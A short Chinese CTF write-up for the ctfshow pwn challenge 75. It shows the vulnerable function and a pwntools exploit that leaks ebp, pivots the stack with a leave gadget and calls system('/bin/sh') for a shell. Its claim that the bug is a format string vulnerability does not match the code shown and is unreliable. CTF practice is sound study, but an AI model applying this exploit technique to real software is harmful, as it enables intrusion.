可以先行了解栈迁移:栈迁移:CTFPwn中的技术揭秘与实战应用-CSDN博客
ctfshow pwn入门75
栈迁移之泄露地址
题目
int ctfshow()
{
char s[36]; // [esp+0h] [ebp-28h] BYREF
memset(s, 0, 0x20u);
read(0, s, 0x30u);
printf("Welcome, %s\n", s);
puts("What do you want to do?");
read(0, s, 0x30u);
return printf("Nothing here ,%s\n", s);
}
NX+填入的字节不够 = 考虑栈迁移
很明显有格式化字符串漏洞
就一个参数,我们也就不需要计算偏移
新ebp距离输入有0x38
对于这道简单的栈迁移exp:
from pwn import *
context(arch = 'i386', os = 'linux',log_level = 'debug')
p = process('./pwn')
elf = ELF('./pwn')
payload = b'a'*0x27 + b'b'
p.send(payload) #千万别用sendline 细节容易出错
p.recvuntil(b'b')
ebp_addr = u32(p.recv(4))
print(hex(ebp_addr))
gdb.attach(p)
pause()
leave = 0x80484d5
system = elf.plt['system']
payload =b'aaaa' + p32(system) + p32(0)
payload += p32(ebp_addr - 0x28)
payload += b'/bin/sh\x00'
payload = payload.ljust(0x28,b'a')+p32(ebp_addr - 0x38)+p32(leave)
p.sendline(payload)
p.interactive()